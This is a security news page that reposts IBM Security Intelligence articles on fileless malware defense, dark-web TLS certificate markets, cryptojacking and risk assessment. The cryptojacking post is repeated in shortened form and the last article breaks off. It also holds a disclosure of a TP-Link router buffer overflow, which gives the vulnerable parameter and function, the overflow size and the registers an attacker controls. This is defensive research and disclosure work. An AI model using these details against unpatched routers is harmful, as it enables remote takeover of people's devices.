ThreatRavens.

Browsing category

Risk Management

Access Management, Endpoint, Endpoint Protection, IBM X-Force Incident Response and Intelligence Services (IRIS), Legacy Applications, Malware, Patch Management, Point-of-Sale (POS) Systems, Privileged Users, Risk Management, Threat Detection, Windows,

How to Defend Your Organization Against Fileless Malware Attacks

The threat of fileless malware and its potential to harm enterprises is growing.

Fileless malware leverages what threat actors call “living off the land,” meaning the malware uses code that already exists on the average Windows computer. When you think about the modern Windows setup, this is a lot of code: PowerShell, Windows Management Instrumentation (WMI), Visual Basic (VB), Windows Registry keys that have actionable data, the .NET framework, etc. Malware doesn’t have to drop a file to use these programs for bad intentions.

The combination of all of these code sources is generally called process hollowing — a tactic in which malware uses a particular process as a storage container and distribution mechanism for its code. One recent attack discovered by FireEye combined PowerShell, VB scripts and .NET in a single lethal package.

Attacks leveraging PowerShell are particularly on the rise. Last fall, IBM X-Force Incident Response and Intelligence Services (IRIS) demonstrated just how potent PowerShell-based exploits can be, since code is executed directly from a PC’s memory. Plus, PowerShell can be used for remote access attacks and get around application whitelisting protections.

Given this growing threat, what can security teams do to help defend their organizations against fileless malware?

Ensure Strong Companywide Security Hygiene

The general thrust of how to combat fileless malware begins with making sure your Windows computers are patched and up to date. Since one of the first tenets of threat actors is taking advantage of unpatched, older systems, to delay patch management is to introduce a vulnerability into your network. The spread of EternalBlue illustrated this well; the patch was available for more than a month before the exploit was launched.

The next step is to ensure you have a solid security awareness training regimen. This doesn’t mean running annual exercises or sending out the occasional test phishing email. Instead, come up with a program that operates continuously and is always making users aware of the dangers of email attachments and clicking on links willy-nilly. Most fileless campaigns begin their life with a simple phishing email, so it is important to try to nip these entry points quickly.

Third is to understand the behavior of built-in Windows code so you can spot anomalies, such as when encrypted PowerShell scripts are installed to run as a service. The combination of the two — the encryption and the service feature — should be a red flag. Analysts sometimes see compression tools instead of or in addition to encryption as well. Another red flag is finding a PowerShell script hiding in the TEMP directory; while not technically fileless, this code quickly moves to more dangerous parts of the operating system (OS).

Understand Your Access Rights and Privileges

Organizations should understand what happens when fileless malware first detonates. Just because you have a user who clicked on a malicious attachment doesn’t mean the malware will stay on their PC. Instead, a typical behavior is for the malware to move across your network to find a richer target, such as a domain controller or web server. To prevent this, you should segment your network carefully and make sure you understand access rights, especially for third-party applications and users.

A common attack method is escalating privileges as malware moves around the network, which can be done using PowerShell, for example. They don’t call it PowerShell for nothing: An actor can issue commands for reverse Domain Name System (DNS) queries, enumerate access control lists on any network share and find members of a particular domain group. This means one of the more basic controls for any malware is to restrict administrator rights to the minimum number of systems.

Many fileless exploits count on the profligate use of rights that aren’t needed or are attached to users that have since left the company, or outdated rights for users who don’t access the targeted applications anymore. Companies should develop methods to detect when these situations occur and be able to shut them down quickly. Organizations should also disable Windows programs that aren’t needed. Not everyone needs PowerShell running on their computer, or support for the .NET framework. Even more effective is to eliminate support for ancient protocols such as SMBv1, which was what caused all the trouble with WannaCry.

Finally, while PowerShell can get around application whitelisting, it is still a good idea to deploy such controls. The more you know about how your users consume applications, the more likely you will be able to catch a piece of malware doing something that no other legit app has been observed doing. Another way is to disable macros, including Office macros, which are often abused by malware writers, although this isn’t a universal solution because many users do need them to do their jobs.

As a side note, Windows can be used for more than just desktop computers, and threat actors will sometimes target embedded Windows point-of-sale (POS) machines. The attraction here is that these computers have direct access to payment card data, so having extra protection for this population is crucial.

Combat Fileless Malware Threats With Careful Coordination

Microsoft hasn’t been standing still while fileless attacks run rampant. In fact, the company has developed an open interface called Antimalware Scan Interface that some vendors have begun using to make it easier to detect the “tells” of the fileless world, especially when it comes to analyzing scripting behavior.

In addition, anyone who wants to gain a better understanding of fileless attacks should check out the open source project AltFS. This is a complete fileless virtual file system to demonstrate how these techniques work, and it can be deployed on Windows and Mac PCs.

As you can see, fighting fileless malware attacks will take some serious effort and careful coordination among a variety of tools and techniques. With more unpredictable malware threats on the horizon, organizations should take steps today to strengthen their defenses.

The post How to Defend Your Organization Against Fileless Malware Attacks appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: David Strom

April 17, 2019

Artificial Intelligence (AI), Certificate Authority (CA), Credentials Theft, Cybercrime, Dark Web, Encryption, Financial Fraud, https, Identity & Access, Identity and Access Management (IAM), Malicious Domain, Man-in-the-Middle (MitM) Attack, Network, Phishing, Privileged Access, Ransomware, Risk Management, Secure Sockets Layer (SSL), Single Sign-On (SSO), Threat Monitoring, Transport Layer Security (TLS), Website Vulnerabilities,

Dark Web TLS/SSL Certificates Highlight Need for Shift to Zero Trust Security

More and more, organizations and end users are embracing encryption to protect their data and traffic. By far the most visible part of this adaptation is the use of Hypertext Transfer Protocol Secure (HTTPS) for accessing websites. As opposed to the more basic HTTP, which is the plain text version, HTTPS makes use of Transport Layer Security (TLS) or Secure Sockets Layer (SSL) certificates to encrypt traffic between web servers and clients.

Does this mean that once you’ve implemented TLS/SSL certificates you should no longer worry? Not exactly. There are many cyberthreats that make it necessary to stay vigilant by following a zero trust security model.

Some of the latest threats originate from thriving dark web marketplaces for these certificates, which often come packaged with other cybercrime services. But before we get to that, a little more on HTTPS and TLS/SSL.

A Very Brief Introduction to HTTPS and TLS/SSL

HTTPS is HTTP with an extra layer on top, the TLS/SSL encryption layer. This layer ensures that both the client and the server can continue to speak HTTP with each other, but over a secure connection. Under normal circumstances, this serves three main purposes:

Confidentiality — preventing others from reading your communications.
Integrity — making sure the web content isn’t altered in transit.
Authentication — ensuring that the client (your web browser, for example) connects to the intended web server.

Setting up a security layer on your web infrastructure and adding TLS/SSL certificates to your websites undoubtedly increases security and is in the interest of your customers and users. If there’s one key task you should tackle immediately it’s migrating all your existing HTTP-only sites to HTTPS versions. Although setting up HTTPS has now become a fairly easy process with the help of tutorials such as HTTPS Is Easy! and tooling such as Certbot, there are several key elements that you should be aware of.

When the secure layer is bootstrapped, a handshake happens between the server and the client in which, among other things, the server proves its identity via TLS/SSL certificates. This identity is included as a property of the certificate and describes which domain the certificate belongs to. During this handshake, the client will also check whether it trusts the certificate, or that the certificate is verified and trusted by a certificate authority (CAs) that it also trusts.

Proving Your Ownership of a Domain

To prevent people from acquiring a certificate for domains they do not own, a number of verification steps must be completed. These steps allow you to prove that you’re the rightful domain holder.

Depending on your certificate provider, you will need to prove that you control the DNS settings of the domain (by adding a TXT record, for example), have access to a specific email account belonging to that domain or are able to put up a text file on the public website of the domain.

The next level of identity checks of the domain holder happens with Extended Validation (EV) certificates. Previously, an EV certificate was represented differently in browsers via a green bar, but due to recent browser changes, these visual differences are no longer immediately noticeable for users. As such, because most users will not be able to visually differentiate between EV and non-EV certificates and because they are not necessarily more secure or cryptographically stronger than other certificates, there is really no extra value in spending on EV certificates.

HTTPS Doesn’t Mean Safe

A common misconception is that HTTPS automatically means safe. It doesn’t. It actually stands for secure, meaning that the underlying website that you access via that secure channel can still cause harm to you or your organization. This is very well demonstrated by Netcraft statistics on the number of phishing websites that make use of certificates.

But this isn’t the only threat you should be aware of when it comes to website security.

An Emerging Black Market for TLS/SSL Certificates

Research from Georgia State University and the University of Surrey, sponsored by Venafi, described the appearance of thriving marketplaces for TLS/SSL certificates on the dark web. This type of marketplace might sound strange at first. After all, you can get certificates for free, so why would you want to pay extra for obtaining TLS/SSL certificates, let alone do it on the dark web?

However, if you take a closer look at what exactly is for sale, it becomes clear that these sales do not only include a certificate, but a larger package deal.

According to the researchers, these packages include cybercrime services such as malicious websites and ransomware, but also aged domains, website design services and payment services. Some packages even offer deals that help the buyer set up a company, together with all the necessary company documents and a Data Universal Numbering System (DUNS) number. The deal is then complemented with an EV-SSL certificate from a known certificate vendor.

What Risks Are Associated With This Market?

The threats associated with these dark web offerings are not immediately linked to weaknesses in the certificates themselves, but rather to the services that are provided via the secure website that’s part of the offering.

Phishing

Phishing websites that resemble legitimate websites remain a threat. But whether a phishing site was acquired via the dark web or not doesn’t immediately increase the threat. Cybercriminals can already register new domains that resemble existing ones and acquire a valid certificate from a legitimate certificate provider outside the black market. The added advantage of these marketplaces, from an attacker’s point of view, is the inclusion of web design services and support.

Financial Loss

Another potential consequence of black market TLS/SSL certificates is financial loss due to fraud. Website visitors who assume they are dealing with a legitimate e-commerce site might be inclined to buy goods and pay for them with their credit card or other payment information.

Illicit websites often present themselves as a real online store that is protected with a proper certificate and accepts money via a trusted payment system. Even trained security professionals sometimes have a hard time differentiating between a legitimate business site and a malicious one.

Credentials Theft

Although we warn our users not to reuse passwords and request they create unique, strong passwords, we know that in practice this is not always the case. This leads us to another risk: users signing up and creating detailed accounts on legitimate-looking business websites. The threat actors behind these fake sites can not only grab any entered passwords, but they also have access to any other personal information included in setting up the profile.

From an attacker’s point of view, this becomes increasingly interesting when a victim signs up with his or her business email account or other credentials used to access corporate networks or resources. This kind of threat is typically deployed on fake online dating or job listing websites.

Man-in-the-Middle Attacks

Another risk that comes to mind with black market TLS/SSL certificates is attackers spying on encrypted traffic or conducting man-in-the-middle (MITM) attacks. This has happened in the past due to vulnerabilities in cryptographic software libraries or protocol implementations, the most prominent examples being Heartbleed, BEAST and Logjam.

Besides abusing these vulnerabilities, skilled attackers can also attempt to steal the private keys of the certificate. The latter almost always involves a breach of the company infrastructure by an attacker with advanced capabilities.

BGP Hijacking

Yet another important threat you should be aware of is Border Gateway Protocol (BGP) hijacking to obtain valid certificates — valid in the sense that the certificates have not been stolen from their rightful owner and that, according to the CA, the verification process was successful. One method involves an attacker conducting a local hijack to make the CA believe they are the owners of a targeted domain. The hijack consists of redirecting the network, especially the path used for the verification, to a network under the attacker’s control. Although this only works well if the attacker is close enough — networkwise — to the CA and the victim is relatively far, your incident response plan should take this risk into account.

How Do You Defend Against These Threats?

There is no single solution that you can apply as a defensive measure against these attacks. Instead, these are threats you can only combat with zero trust security, a layered defense model and security best practices. Get started by checking off some of these quick wins:

Implement certificate pinning — note that this is being overhauled by Certificate Transparency, an open framework for monitoring and auditing SSL certificates.
Monitor for issued certificates that closely resemble the name of your organization or products. This monitoring can alert you if attackers start targeting your brand, sometimes even before a campaign has started.
Monitor and possibly block domains that have a high deceptive domain score.
Subscribe to the feeds provided by initiatives such as Phishtank or OpenPhish to proactively block access and review the proxy logs for access attempts.
Filter access to newly observed domains (NODs). Be aware that some offerings in the marketplace provide packages of “aged” domains, bypassing this protection measure.
Subscribe to a threat feed or collaborating closely with an information sharing and analysis center (ISAC) or computer security incident response team (CSIRT) to get timely updates about new malicious sites.

Further enhance your defenses with the following best practices for zero trust security:

Encrypt your internal traffic, especially in environments that utilize single sign-on (SSO). It’s important that every resource that requires authentication supports an encrypted communication channel.
Implement role-based access and make sure that users are only put in groups that are strictly necessary to do their job. Avoid having too many users with escalated privileges.
Lock down the environment in which users work, possibly giving them thin clients or systems that are restored to a known good image overnight.
Monitor your entire IT environment, including endpoints, servers and internal network traffic, and consider applying advanced technologies such as artificial intelligence to help.

The post Dark Web TLS/SSL Certificates Highlight Need for Shift to Zero Trust Security appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Koen Van Impe

April 11, 2019

IBM X-Force Exchange, IBM X-Force Research, Network, Remote Access, Risk Management, Router, Software & App Vulnerabilities, Threat Intelligence, Vulnerabilities, Vulnerability, X-Force, Zero-Day Vulnerability,

Buffer Overflow Vulnerability in TP-Link Routers Can Allow Remote Attackers to Take Control

Internet routers are among the most ubiquitous devices home and business users depend on every day to carry out communications, banking, shopping and commercial transactions. IBM Security researcher Grzegorz Wypych (aka h0rac) took a closer look at one of the most widespread internet routers in use by consumers nowadays, the TP-Link WR-940, and found that a zero-day buffer overflow vulnerability in the router could allow malicious third parties to take control of the device from a remote location.

Let’s dive into more details about this vulnerability, which has been responsibly disclosed to TP-Link by IBM Security and was subsequently issued patches that appear in the closing words of the article.

Figure 1: TP-Link WR940 (Source: TP-Link)

Authenticate and Control

Looking into commonly used routers, our team of ethical hackers examined some of the models that many consumers use in their homes. The reason behind examining router security is their omnipresent status and the potential for attackers to use them against internet users and businesses alike, while mostly relying on automated attacks.

This is the first part in a series of router vulnerability reports. Here, we’ll focus on the TP-Link WR940 device and touch on the software that runs the router — more specifically, TL-WR940N hardware version 3 and TL-WR941ND hardware version 6, both running firmware version 150312.

In the case of these routers, we found a zero-day buffer overflow vulnerability, one that was not previously reported and that worked for authenticated users, allowing them to take unrestricted remote control of the router.

Looking at the software security of the device, it appears that most of the effort to apply controls was put into the web-based interface that users can access to configure the router. However, controls that were placed on the owner’s interface cannot protect the actual router and could allow an attacker to take advantage of that fact.

For example, in the System Tools/Diagnostic tab of the control panel, users have the option to send Internet Control Message Protocol (ICMP) echo requests/response packets via ping. They can send packets either to an IPv4 address or to a hostname. The panel’s security controls may limit character type and number, but nothing stops the user from intercepting requests with a Burp Suite (a graphical tool for testing web application security) proxy and malforming them.

Bug by Bug

We started by looking for some common application vulnerabilities. First we examined command injections because operations such as ping are mostly executed using a Bash shell (Bash is a Unix shell and command language). This was not the case, and we had to rule out the injection attack scenario because we did not find any reference to a system call during static analysis.

What we did find was another interesting activity: When a user sends ping requests, a message is displayed on the device’s console referring to native code compiled to the firmware’s binary.

Figure 2: Ping requests invoke a message on the router’s console

Next, we looked at outgoing GET requests to the ping service by running a Burp Suite proxy to examine them. In the following image, we can see the request’s parameters. The same parameters also appeared in the console message shown in Figure 2.

Figure 3: GET request to ping service

To zoom into the details, we launched the IDA disassembler and looked at some string references. More specifically, we were looking for the “Here is a new ping” reference.

Figure 4: GET request to ping service on IDA Pro

From here, we jumped directly to the referenced function’s address:

# DATA XREF: sub_44C610+5E0↑o

And here, we can see a notable message block:

Figure 5: Message block shown in IDA Pro

The syntax is written in the Microprocessor without Interlocked Pipeline Stages (MIPS) Assembly language, which is designed to work with the MIPS microprocessor paradigm created by J. L. Hennessy in 1981. It is typically used in embedded systems, such as gateways and routers.

Before we look more closely at this message block, here’s a quick crash course on MIPS central processing units (CPUs):

Function parameters are passed in registers $a0-$a3. If a function requires more than four parameters, it is pushed onto the stack.
Register $t9 is often used as a holder for the jump address. We usually load the memory address and jump to it using jalr instruction.
The called function must save any $s0-$sX registers, where X is the max number of available registers of type $s.
The return value is saved in the $v0 or $v1 registers.

Classic Buffer Overflow

Armed with these basics, we can move to the next step of the analysis. In the following image, we can see that the printf function receives a pointer to a string that appears in the console log we looked at earlier (Figure 2). The parameter in this case is being loaded to the $a0 register.

Next, we will invoke the ipAddrDispose function. This one gets loaded to the $a2 register value of 564 in decimal, which could be a parameter in the function. Let’s jump to that function and see what’s inside.

Figure 6: ipAddrDispose’ function exposing buffer overflow issue

We won’t go through a line-by-line analysis here; this is only a fragment of the entire function. What’s interesting about it is the strcpy function call, which is the start of the TP-Link httpd process control, the vulnerable binary. What we have here is a classic buffer overflow issue.

The function copies the input it receives byte by byte and stores it in a buffer of a size that is not properly being handled. The data therefore exceeds the buffer’s boundaries.

We have our bug, but can it truly be exploited? We can find out whether this zero-day is critical by creating a proof-of-concept of an attack scenario.

Status: Exploitable

The first action to attempt when looking at a buffer overflow is to check what happens when the data size exceeds the available space. We will therefore change the ping_addr parameter to hold number of 0x41(A)s, exceeding the buffer’s size. In the following image, the ipAddrDispose function reserves 224 bytes (hexadecimal 0xE0) for its stack frame.

Figure 7: ipAddrDispose reserves 224 bytes for its stack frame

Since the stack can take 224 byes, we elected to send through 300 bytes of A’s instead and see what happens. To do that, we modified the ping_addr parameter in the HTTP request after intercepting it with a Burp suite instance.

Figure 8: Sending 300 bytes of A’s to limited stack

By the following message on the console, we can see that, indeed, it is possible to override the return address $ra and begin controlling program execution.

Figure 9: Router console message shows that address override is possible

Some Pre-Exploit Recon

Before writing an exploit, it is wise to check what is being overwritten here when the oversized payload is sent through. Let’s take a closer look at the core memory dump, which is typically dumped to the /tmp folder.

What we are looking for is information that will help craft the exploit down the line. More specifically, we want to see what registers we can control if we exploit this bug.

To analyze the core memory dump, we downloaded it to our host and placed it in the folder where the extracted file system is found (the httpd binary).

Figure 10: Analyzing TP-Link router core memory dump

Remember, this is MIPS architecture. The next step here will be to open the core dump using gdb-multiarch, which is a GNU Debugger (GDB) with support for multiple architectures. GDB is a source-level debugger that is capable of breaking programs at any specific line, displaying variable values and determining where errors occurred.

Figure 11: Using gdb-multiarch to open core memory dump

We can now control three registers:

$s0;
$s1; and
$ra.

The $a0 register was only partially under our control because it only refers to an address on the stack. Also, keep in mind that the exploitation is taking place on MIPS architecture, which is very different than an exploit written for web application buffer overflow bugs. With this information, we started writing a working exploit code.

Routers: A Modern-Day Essential in Dire Need of Better Security

The American Consumer Institute (ACI) looked into router security and found that no less than 83 percent of routers harbor high-risk vulnerabilities, many of which are open-source flaws. This staggering ratio accounts for both home and office routers and includes major name brands sold around the world.

Routers are not just a relay switch; they have their own operating systems, their own software and, inevitably, their own vulnerabilities. Router vulnerabilities are rather common and can be attributed to various factors. It starts with internet service providers (ISPs) issuing the same router to millions of customers and inadvertently allowing vulnerability aggregation when zero-days arise, but it has more to do with the software that runs routers.

Most manufacturers outsource firmware that gets developed with costs in mind. As such, it is rarely elaborate and, judging by the amount of router vulnerabilities out there, also rarely tested or secure. Making matters worse is the patch and update process: When was the last time you got a message prompting you to update your router’s firmware? Likely almost never. This means that even when patches are dealt with and become available to the public, most users will never know of them or know to take action.

We won’t delve into open networking ports and unsecured protocols that run home routers — think Universal Plug and Play (UPnP), Home Network Administration Protocol (HNAP) and the Wi-Fi Protected Setup (WPS) password — but those interested in further reading should look them up.

How much do these vulnerabilities matter? A lot. At the very least, router vulnerabilities can lead to consumer data being compromised and used by attackers. The same issue can allow criminal/nation-state third parties to spy on users, send them to phishing and malware-hosting websites, or alter data the user sends out when browsing the internet. Routers can also be infected by malware and enslaved by a malicious internet of things (IoT) botnet such as VPNFilter, which can eavesdrop on traffic passing through the router, or the Mirai botnet, which disrupted internet connections as well as telephony and television services in Germany for days before it was possible to stop the mayhem.

Vulnerabilities on routers used by businesses can have similar impacts at scale and likely touch on even more valuable information that could interest cybercriminals and nation-state threat actors alike.

Secure Development, Testing and Better Controls

Limiting the vulnerability of any software to attacks is a task that calls for security in the early stages of the development cycle. The sooner security professionals are introduced to the project, the better the chances are that the end result will be more secure; as a bonus, it is also likely to be much less costly. If that is not a possibility, not all is lost: Scanning code after it is written can also help fix issues and make it more resilient to attacks.

Another way to find and fix issues after devices have been released to the marketplace is by testing them. Penetration testing should look at both code-related security gaps and hardware-related exploitation possibilities. When these are found, they should be prioritized for remediation and addressed promptly to secure the user base from potential attacks.

Router vendors can better enable users with additional security controls: longer password standards, two-factor authentication (2FA) options, more warning prompts when remote access can be attained by unauthorized parties, and the ability to separate modem and router functions, to name a few. Routers are an essential part of almost every home’s communication consumption, and security has become equally essential to keep those homes and their residents’ data and privacy safe.

TP-Link Patches for Users of These Models

After disclosure, TP-Link’s security team released a patch and indicated that both devices in these hardware versions are no longer being manufactured (product end of life).

The new firmware has been published on the website for both devices in their affected hardware revisions (firmware is labeled 190218).

Support/Download Page Links

TL-WR940Nv3: https://www.tp-link.com/pl/download/TL-WR940N_V3.html#Firmware
TL-WR941NDv6: https://www.tp-link.com/pl/download/TL-WR941ND.html#Firmware

The post Buffer Overflow Vulnerability in TP-Link Routers Can Allow Remote Attackers to Take Control appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Grzegorz Wypych

April 8, 2019

cryptocurrency, cryptocurrency miner, IBM X-Force Incident Response and Intelligence Services (IRIS), IBM X-Force Research, Injection Attacks, Malware, Risk Management, Threat Intelligence,

Cryptojacking Attacks: Who’s Mining on Your Coin?

Data from the “IBM X-Force Threat Intelligence Index” for 2018 illustrated that threat actors have been increasingly using malicious cryptomining, aka cryptojacking attacks, to easily monetize their access to systems with minimal risk. The 2019 report showed that threat actors continue to use these attacks to compromise systems and generate a revenue stream.

There are two types of cryptomining attacks that have been making the rounds since 2018:

Malicious mining via compromised websites, also known as cryptojacking. This activity takes place in-browser.
Malware-based cryptomining attacks on a user’s device. This activity relies on the device’s central processing unit (CPU) power.

In 2018, X-Force saw a majority of browser-based mining versus the malware-based variety. In fact, our data shows a nearly 2-1 ratio, respectively. This attack tactic is becoming a rising issue; cryptojacking presents a unique challenge for organizations to detect and mitigate because malicious scripts are almost always hosted outside the organization’s zone of control.

Cryptojacking definitely trended in 2018, but are tides about to turn? X-Force data from late 2018 and early 2019 showed that browser-based cryptojacking attacks are on the decline while also revealing a notable increase in malware-based attacks.

Cryptomining Malware: A Primer

The value and popularity of cryptocurrency have been growing across the globe, and criminals are always looking for ways to generate passive income. One of the ways they tie the two together is by using coin-mining malware. Research from X-Force has addressed cryptocurrency miners before. To review, cryptominers are placed on an infected machine or device and use its native processing power to mine for cryptocurrency.

Historically, threat actors have targeted individual user boxes to drop cryptocurrency miners on, but recent research from X-Force Incident Response and Intelligence Services (IRIS) suggested that since at least 2017, threat actors have also tried to infect targeted internet of things (IoT) devices despite their low processing power.

What Could Be Driving a Shift to Cryptojacking?

Why would threat actors use malicious cryptomining instead of focusing on other attacks such as ransomware, for example? Threat actors can see some success in getting their malware on user devices, but for those motivated by monetary gain, converting that access into spendable currency has always been a challenge.

Over time, cybercriminals have tried different methods, such as selling stolen data, locking a device and demanding ransom payment from its owner, and selling a remote shell to the compromised device to other threat actors who can then deploy their own attack tactics on that device.

All of these tactics primarily require other people to become involved in their success — an option most criminals prefer to forego if only to avoid sharing the spoils. But they can’t sell access or data without a buyer, nor can they profit from ransomware without someone on the other end willing to pay. To minimize interaction with other parties, including victims who may or may not pay, many criminals evidently prefer cryptojacking. These attacks are suited for cybercriminals at any skill level, do not require much in terms of interaction with third parties and can be monetized relatively easily when compared with malware operations such as ransomware and banking Trojans.

To get into user devices, threat actors often deploy cryptomining malware via command injection attacks against enterprise-level assets, such as vulnerable applications in content management systems (CMSs). In instances observed by X-Force IRIS, attackers have attempted to plant malicious images on victims’ machines using wget and curl shell commands when victims simply visit a malicious page via a link in an email or through a compromised site.

2018: The Rise of Cryptomining in the Browser

Browser-based cryptojacking involves a threat actor infecting a web server or website and then injecting a cryptomining script into an otherwise legitimate website. Alternatively, the script can be inserted into an online advertisement, whether malicious or wholly illegitimate, and used with a legitimate ad service so that the script runs every time the browser is open.

X-Force research saw an explosion of cryptojacking activity in 2018, with cryptojacking attacks far exceeding all other forms of coin theft attacks.

Some of this rise in browser-based cryptojacking comes from unintended sources, such as vendors who sell cryptojacking scripts as an alternative to running advertisements on websites. The initial purpose is legitimate, but they can also be used by attackers who run them on compromised websites. One of the largest providers of mining scripts of that type was Coinhive, an organization that pioneered the sale of these scripts. As a result of frequent use of Coinhive scripts in cryptojacking attacks, users and security professionals would often see the name “Coinhive” or “Coinhive.Miner” appear as a malicious issue. In March 2019, Coinhive voluntarily ceased operations.

Figure 1: Cryptojacking attacks exceeded malware cryptomining attacks by a nearly 2-1 ratio in 2018 (source: IBM X-Force)

Cryptojacking Was Big in 2018, So Why Shift to Cryptomining Malware in 2019?

As our data shows, browser-based cryptojacking was big in 2018. But as we moved into 2019, our data started showing a decline in that type of attack and a return to malware-based cryptojacking. A number of factors could be contributing to this shift.

One possibility is that the recent drop in cryptocurrency prices has made mining in the browser less profitable. Since the browser is merely an application on a device, it cannot generate the same computing power as infecting the actual device. As a result, this type of cryptojacking takes much longer to generate each coin, which may be incentivizing threat actors to refocus on malware infections to speed things up.

Additionally, sharply reduced cryptocurrency value could encourage actors to move to an entirely different revenue stream, causing cryptomining malware to have a higher proportion of activity even though nominal levels may have dropped.

Threat actors could also be temporarily shifting away from browser-based cryptojacking if they relied on Coinhive to provide them with scripts. With Coinhive gone, threat actors would have to go to other script providers. While there are many other providers of the same sort of scripts, the removal of Coinhive could affect the overall ability of the technically unskilled to create web-based cryptojacking attacks.

Don’t rejoice just yet — browser-based cryptojacking may see a resurgence in the near future due to the recent and sharp drop in the Monero hash rate. A reduced hash rate makes mining each coin less computationally intensive, making cryptojacking a more profitable option despite its lower harvesting power.

Which Should I Worry About More: Browser-Based Cryptojacking or Cryptomining Malware?

The short answer is both. X-Force data indicates that while browser-based cryptojacking was increasingly popular through most of 2018, cryptomining malware made a resurgence at the end of 2018 and into the first quarter of 2019.

Figure 2: IBM X-Force data showing the rise and fall of cryptojacking popularity (source: IBM X-Force)

Browser-based cryptojacking was very popular with threat actors earlier in 2018, likely due to the following factors:

Without having to use malware and maintain a botnet, browser-based attacks can be easier for cybercriminals to set up compared to other forms of cryptomining attacks.
Threat actors needed only to infect a single web server to deploy a cryptojacking script to all visitors of that site and any other sites hosted thereon.
Cryptojacking is tougher for organizations to mitigate than cryptomining malware, since the infection occurs outside the organization on an unaffiliated server and takes advantage of users browsing to a compromised resource. In most cases, when the company’s security team sees alerts for mining activity, there isn’t much it can do to clean up within the company’s own devices. While one could notify the web server’s owner of the compromise, they may not know what to do about it or fail to address the issue.
With browser-based cryptojacking, a threat actor can forego wide-cast infection campaigns and the need to infect myriad devices. Instead, they aim to compromise a few web servers and expect to reach untold numbers of site visitors.

Figure 3: Browser-based cryptojacking resides outside an organization’s zone of control (source: IBM X-Force)

Some Tips for Defenders

Malicious cryptomining and browser-based cryptojacking attacks are plentiful, but they are not impossible to defend against. Here are some tips for defenders from our X-Force IRIS threat intelligence specialists:

Engage in a thorough risk assessment to determine the acceptable risk appetite for malicious cryptomining activity for the organization.
Restrict outbound calls to cryptomining pools to help detect and prevent cryptomining within the organization’s environments.
Where feasible, disable JavaScript in browsers to directly prevent cryptojacking scripts from executing.
Update host-based detection signatures to include the latest cryptomining malware and, if possible, alert on significantly anomalous processor activity that may be indicative of ongoing cryptomining malware infections.
Continue updating intrusion detection and prevention system (IDS/IPS) signatures to help block the latest cryptojacking scripts.
Work closely with network security operations to block traffic to and from known cryptojacking addresses that can be obtained from a threat intelligence provider or maintained internally.
Educate stakeholders on the difference between browser- and device-based cryptojacking to facilitate better informed conversations on the organization’s cybersecurity posture.

Join X-Force Exchange to stay up to date on cryptojacking campaigns

The post Cryptojacking Attacks: Who’s Mining on Your Coin? appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Charles DeBeck

April 5, 2019

cryptocurrency, cryptocurrency miner, IBM X-Force Incident Response and Intelligence Services (IRIS), IBM X-Force Research, Injection Attacks, Malware, Risk Management, Threat Intelligence,

Cryptojacking Attacks: Who’s Mining on Your Coin?

There are two types of cryptomining attacks that have been making the rounds since 2018:

Malicious mining via compromised websites, also known as cryptojacking. This activity takes place in-browser.
Malware-based cryptomining attacks on a user’s device. This activity relies on the device’s central processing unit (CPU) power.

Cryptomining Malware: A Primer

What Could Be Driving a Shift to Cryptojacking?

2018: The Rise of Cryptomining in the Browser

X-Force research saw an explosion of cryptojacking activity in 2018, with cryptojacking attacks far exceeding all other forms of coin theft attacks.

Figure 1: Cryptojacking attacks exceeded malware cryptomining attacks by a nearly 2-1 ratio in 2018 (source: IBM X-Force)

Cryptojacking Was Big in 2018, So Why Shift to Cryptomining Malware in 2019?

Which Should I Worry About More: Browser-Based Cryptojacking or Cryptomining Malware?

Figure 2: IBM X-Force data showing the rise and fall of cryptojacking popularity (source: IBM X-Force)

Browser-based cryptojacking was very popular with threat actors earlier in 2018, likely due to the following factors:

Without having to use malware and maintain a botnet, browser-based attacks can be easier for cybercriminals to set up compared to other forms of cryptomining attacks.
Threat actors needed only to infect a single web server to deploy a cryptojacking script to all visitors of that site and any other sites hosted thereon.
Cryptojacking is tougher for organizations to mitigate than cryptomining malware, since the infection occurs outside the organization on an unaffiliated server and takes advantage of users browsing to a compromised resource. In most cases, when the company’s security team sees alerts for mining activity, there isn’t much it can do to clean up within the company’s own devices. While one could notify the web server’s owner of the compromise, they may not know what to do about it or fail to address the issue.
With browser-based cryptojacking, a threat actor can forego wide-cast infection campaigns and the need to infect myriad devices. Instead, they aim to compromise a few web servers and expect to reach untold numbers of site visitors.

Figure 3: Browser-based cryptojacking resides outside an organization’s zone of control (source: IBM X-Force)

Some Tips for Defenders

Engage in a thorough risk assessment to determine the acceptable risk appetite for malicious cryptomining activity for the organization.
Restrict outbound calls to cryptomining pools to help detect and prevent cryptomining within the organization’s environments.
Where feasible, disable JavaScript in browsers to directly prevent cryptojacking scripts from executing.
Update host-based detection signatures to include the latest cryptomining malware and, if possible, alert on significantly anomalous processor activity that may be indicative of ongoing cryptomining malware infections.
Continue updating intrusion detection and prevention system (IDS/IPS) signatures to help block the latest cryptojacking scripts.
Work closely with network security operations to block traffic to and from known cryptojacking addresses that can be obtained from a threat intelligence provider or maintained internally.
Educate stakeholders on the difference between browser- and device-based cryptojacking to facilitate better informed conversations on the organization’s cybersecurity posture.

Join X-Force Exchange to stay up to date on cryptojacking campaigns

The post Cryptojacking Attacks: Who’s Mining on Your Coin? appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Charles DeBeck

April 5, 2019

cyber risk, Cybercrime, Internet of Things (IoT), IoT Security, Legacy Applications, Malware, Multifactor Authentication (MFA), Risk Assessment, Risk Management, Security Strategy, Security Training, Security Trends, Threat Detection, Vulnerabilities,

To Move Forward Securely, Look Backward With Ongoing Risk Assessments

As security professionals, we’re constantly on the lookout for the latest research and trends to stay on top of new threats. This is sensible in that novel attacks seem most likely to go undetected, but if we focus on the future at the expense of performing risk assessments to maintain defenses against existing threats, we will always be one step behind attackers.

It’s said that history doesn’t repeat itself, but it often rhymes. This is particularly true with cybercrime. As we’ve watched malware trends shift from one generation of technology to the next, it’s clear that old techniques are often reused.

Legacy Code, Current Security Problems

Technology moves quickly, and most organizations have a lot on their plates dealing with a constant influx of new apps and devices. Each new wave of changes brings a new codebase and a new attack surface. It’s reasonable to take these risks seriously, but in this constant race to address new threats, we can accrue security debt that opens us up to threats that have not been completely addressed in older technology.

